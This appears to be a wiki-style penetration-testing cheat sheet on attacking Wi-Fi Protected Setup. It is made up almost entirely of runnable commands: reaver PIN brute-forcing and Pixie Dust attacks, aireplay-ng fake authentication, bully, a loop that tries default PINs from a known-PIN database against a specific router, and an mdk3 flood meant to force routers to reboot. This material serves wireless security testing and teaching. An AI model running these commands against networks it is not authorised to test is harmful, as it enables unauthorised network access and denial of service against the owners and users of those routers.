WPS

Reaver:

# The next command brute forces WPS pins, online cracking similar to hydra (-vvv for verbose, --no-associate if we have previously associated with aireplay-ng --fakeauth)
reaver -b <AP bssid> -i wlan0mon -v
reaver --bssid <AP bssid> --channel <AP channel> --interface wlan0mon -vvv --no-associate

# Pixie attack (-K), faster than the regular brute force, but doesn't always work, depends on the AP PRGA 
reaver -i {monitor interface} -b {BSSID of router} -c {router channel} -vvv -K 1 -f
# OR 
reaver -b <AP BSSID> -i wlan0mon -v -A --no-nacks # lower timedelay between guess using -d 0 or --dh-small 

# When the previous command is sent it stays waiting if we are not associated with the AP. We can do it with aireplay, so that the AP doesn't ignore the future packets that we will send (instead of 0 we can use a certain number of seconds to be associated)
sudo aireplay-ng --fakeauth 120 -a <AP bssid> wlan0mon

Bully:

bully -d wlan0mon -b F0:7D:68:44:61:EA -B -c 6

AP lookup:

#Some APs use a pin that is linked to the first three bytes of the BSSID. Airgeddon contains them in known_pins.db
#To check if a certain BSSID has known default pins, use the first three bytes of the AP (without the colon symbols, in this case XXYYZ for a BSSID= XX:YY:ZZ:AA:BB:CC)

source /usr/share/airgeddon/known_pins.db
echo ${PINDB["XXYYZZ"]} > pins.txt
cat pins.txt | while read pin; do reaver -b F0:7D:68:44:61:EA -i wlan0mon -v -c 6 --no-nacks -p $pin; done

DoS Router to restart/unlock WPS:

# DoS to an AP, with different MACs, as if it were a DDoS. Some routers reboot when too many different MACs try to connect to them because they cannot handle so many connections
# Help of the "a" option of mdk3 (used for DoS) withs
mdk3 --help a 

# DoS (-m for using real looking MACs, not arbitrary ones like 00:00:00:00:00:00)
mdk3 wlan0mon a -a <AP BSSID> -m

PreviousWPA Enterprise NextBluetooth

Last updated 2 years ago